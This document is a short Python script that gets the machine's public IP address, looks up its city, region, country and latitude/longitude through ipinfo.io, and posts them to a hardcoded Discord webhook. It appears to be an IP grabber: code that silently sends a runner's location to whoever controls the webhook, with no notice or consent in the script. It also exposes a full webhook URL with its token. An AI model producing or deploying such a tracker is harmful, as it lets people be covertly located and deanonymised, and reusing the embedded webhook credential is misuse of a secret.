import requests
import json

def get_public_ip():
    response = requests.get('https://api.ipify.org?format=json')
    return response.json().get('ip')

def get_location(ip):
    response = requests.get(f'https://ipinfo.io/{ip}/json')
    data = response.json()
    location = {
        'city': data.get('city'),
        'region': data.get('region'),
        'country': data.get('country'),
        'loc': data.get('loc')  # Latitude and longitude
    }
    return location

def send_to_discord(webhook_url, message):
    headers = {
        'Content-Type': 'application/json'
    }
    data = {
        'content': message
    }
    response = requests.post(webhook_url, headers=headers, data=json.dumps(data))
    if response.status_code == 204:
        print('Message sent successfully.')
    else:
        print(f'Failed to send message. Status code: {response.status_code}')

def main():
    webhook_url = 'https://discord.com/api/webhooks/1274831165999681688/CCHeUPAQJYBW_5UbxytjmLJuEsugP7J5qaf84Vib58I8Lwckpuwl6HpgfO6vLLA1oqrb'
    
    # Get IP and location
    ip = get_public_ip()
    location = get_location(ip)
    
    # Create message
    message = (
        f"**IP Address:** {ip}\n"
        f"**City:** {location['city']}\n"
        f"**Region:** {location['region']}\n"
        f"**Country:** {location['country']}\n"
        f"**Location (Lat, Long):** {location['loc']}"
    )
    
    # Send message to Discord
    send_to_discord(webhook_url, message)

if __name__ == '__main__':
    main()
